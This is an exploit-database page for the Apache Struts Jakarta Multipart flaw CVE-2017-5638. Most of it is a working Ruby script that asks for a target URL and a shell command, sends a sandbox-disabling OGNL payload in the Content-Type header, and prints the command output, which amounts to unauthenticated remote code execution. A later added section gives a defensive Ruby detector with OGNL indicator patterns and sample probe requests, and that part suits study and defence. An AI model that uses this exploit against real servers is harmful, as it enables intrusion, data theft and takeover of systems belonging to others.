Apache Struts Vulnerability (Ruby Exploit)

2017.04.19
Credit: Mateus Lino
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

require 'typhoeus'
#HatBash BR
#http://hatbashbr.com/
#https://github.com/hatbashbr
#gem install typhoeus
#Mateus Lino a.k.a Dctor | Everton a.k.a Xguardian |
#CVE - 2017-5638

puts "Insert URL: "
target = gets.chomp
puts "Insert Command. Example: ls"
# Read the command as a plain string. (The original did
# command.each{|i| i}.join(" "), which relies on the Ruby 1.8 String#each
# and raises NoMethodError on Ruby 1.9 and later.)
cmd = gets.chomp

# The OGNL expression travels in the Content-Type header: the vulnerable
# Jakarta Multipart parser copies the invalid header value into an error
# message that Struts then evaluates as OGNL.
payload = []
payload << "%{(#_='multipart/form-data')."
# Disable the OGNL sandbox: replace the member-access policy and clear the
# excluded package/class lists (the nested form handles both Struts branches).
payload << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload << "(#_memberAccess?"
payload << "(#_memberAccess=#dm):"
payload << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload << "(#ognlUtil.getExcludedPackageNames().clear())."
payload << "(#ognlUtil.getExcludedClasses().clear())."
payload << "(#context.setMemberAccess(#dm))))."
# Run the command through cmd.exe or /bin/bash depending on the server OS.
payload << "(#cmd='"
payload << cmd
payload << "')."
payload << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload << "(#p=new java.lang.ProcessBuilder(#cmds))."
payload << "(#p.redirectErrorStream(true)).(#process=#p.start())."
# Copy the process output (stdout and stderr) into the HTTP response body.
payload << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload << "(#ros.flush())}"

# A GET is enough: the header is parsed before any action logic runs.
request = Typhoeus.get(target, headers: {'User-Agent'=>'Mozilla/5','Content-Type'=> payload.join})
puts request.body
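The defensive counterpart to the exploit above, added here as an example and not part of the original advisory or of Struts itself: a Ruby check that flags HTTP requests whose Content-Type header is an OGNL expression instead of a media type, which is exactly what CVE-2017-5638 needs. The Jakarta Multipart parser is selected whenever the header starts with (or, as the payload above shows, merely contains) "multipart/form-data", so matching on the MIME type alone is not a useful filter; the check looks for expression syntax and the sandbox-bypass identifiers the payload uses, and also flags any value that is not a syntactically valid media type, since an invalid value is the error path the vulnerable parser took. The request samples, header names and helper function names are constructed for this example.

```ruby
# Added example (not from the original page): detect CVE-2017-5638-style OGNL
# injection in the Content-Type header of raw HTTP requests.

# Markers that the header value is an OGNL expression rather than a media type.
OGNL_INDICATORS = [
  /%\{/,                          # OGNL expression opener used by the exploit
  /\$\{/,                         # alternative expression opener
  /#_memberAccess/,               # sandbox bypass used by the payload
  /@ognl\.OgnlContext@/,
  /java\.lang\.ProcessBuilder/,
  /@java\.lang\.Runtime@/,
  /com\.opensymphony\.xwork2/,
].freeze

# A well-formed Content-Type is type/subtype followed by optional
# ;-separated name=value parameters (simplified token grammar, an assumption).
VALID_CONTENT_TYPE = %r{\A[A-Za-z0-9.+-]+/[A-Za-z0-9.+-]+(\s*;\s*[^;=]+=("[^"]*"|[^;]*))*\s*\z}

# true when the header value should be treated as an attack attempt
def ognl_injection?(content_type)
  return false if content_type.nil?
  return true if OGNL_INDICATORS.any? { |re| re.match?(content_type) }
  # Anything that is not a valid media type is suspicious too: the vulnerable
  # parser put the invalid header value into an error message that was then
  # evaluated as OGNL.
  !VALID_CONTENT_TYPE.match?(content_type)
end

# Pull the Content-Type value out of a raw HTTP request (headers only needed).
def content_type_of(raw_request)
  headers = raw_request.split(/\r?\n\r?\n/, 2).first
  line = headers.lines.find { |l| l =~ /\AContent-Type:/i }
  line && line.sub(/\AContent-Type:\s*/i, '').chomp
end

# Return one hit per flagged request: its request line and the offending value.
def scan_requests(raw_requests)
  raw_requests.each_with_object([]) do |req, hits|
    ct = content_type_of(req)
    next unless ognl_injection?(ct)
    hits << { request: req.lines.first.chomp, content_type: ct }
  end
end

# Constructed sample traffic (not captured from a real system).
SAMPLE_REQUESTS = [
  # ordinary file upload: legitimate multipart, must not be flagged
  "POST /upload.action HTTP/1.1\r\nHost: app.example\r\nContent-Type: multipart/form-data; boundary=----abc123\r\n\r\n",
  # CVE-2017-5638 probe shaped like the exploit above (shortened)
  "GET /index.action HTTP/1.1\r\nHost: app.example\r\nUser-Agent: Mozilla/5\r\nContent-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id')}\r\n\r\n",
  # JSON API call, must not be flagged
  "POST /api/v1/items HTTP/1.1\r\nHost: app.example\r\nContent-Type: application/json\r\n\r\n{}",
  # no Content-Type at all
  "GET /health HTTP/1.1\r\nHost: app.example\r\n\r\n",
  # malformed value with no OGNL keywords: still the vulnerable error path
  "GET /index.action HTTP/1.1\r\nHost: app.example\r\nContent-Type: notamimetype\r\n\r\n",
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_requests(SAMPLE_REQUESTS).each do |hit|
    puts "#{hit[:request]}  <-  Content-Type: #{hit[:content_type]}"
  end
end
```

Run it against a proxy log or a pcap export one request per string; the two flagged samples are the OGNL probe and the malformed value. Treat the "not a media type" rule as a triage signal rather than a block rule if your application legitimately receives odd Content-Type values, and keep the indicator list as a supplement to patching (Struts 2.3.32 / 2.5.10.1 fixed the parser), not a replacement for it.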



Copyright 2017, cxsecurity.com